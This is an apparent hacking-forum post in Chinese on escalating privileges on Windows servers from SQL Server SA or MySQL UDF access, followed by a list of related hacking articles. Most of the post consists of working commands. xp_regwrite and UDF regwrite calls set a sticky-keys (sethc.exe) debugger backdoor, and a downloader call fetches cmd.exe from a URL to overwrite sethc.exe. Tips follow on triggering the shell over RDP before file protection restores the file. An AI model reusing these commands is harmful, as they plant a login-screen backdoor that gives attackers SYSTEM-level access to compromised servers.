t00ls.net
SA权限下有时候不能执行命令,写注册表提权
:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_SZ','c:\\windows\\explorer.exe'
:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_SZ','c:\\windows\\system32\\taskmgr.exe'
写注册表函数.
select regwrite("HKEY_LOCAL_MACHINE","SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe","Debugger","REG_SZ","E:\\web\\170stock\\admin\\include\\explorer.exe");
通过udf提权加上regwrite这个函数
然后改注册表,把sethc.exe 的路径改成了我们想运行的程序(比如cmd)
然后连3389,按下5次shift就执行我我们的程序,很好,就是sethc后门原理
不过管理组做了手脚,我们加到localgroup administrators的用户进不去3389
================================
select downloader("http://ssss//cmd.exe","c:\\windows\\system32\\sethc.exe");
然后迅速登录3389,shift5下..哈哈...~
因为慢点就会被文件保护机制改回去了
只显示10条记录相关文章
webshell 提权小技巧 (浏览: 358, 评论: 0)
小谈WIN系统Hacking中的小命令2 (浏览: 8672, 评论: 0)
谈环境变量在Hacking中的利用 (浏览: 7464, 评论: 0)
续谈Hacking中的小技巧 (浏览: 8716, 评论: 0)
小谈WIN系统Hacking中提权前的小命令 (浏览: 10939, 评论: 0)
小谈WIN系统Hacking中的小命令2 (浏览: 8672, 评论: 0)
谈环境变量在Hacking中的利用 (浏览: 7464, 评论: 0)
续谈Hacking中的小技巧 (浏览: 8716, 评论: 0)
小谈WIN系统Hacking中提权前的小命令 (浏览: 10939, 评论: 0)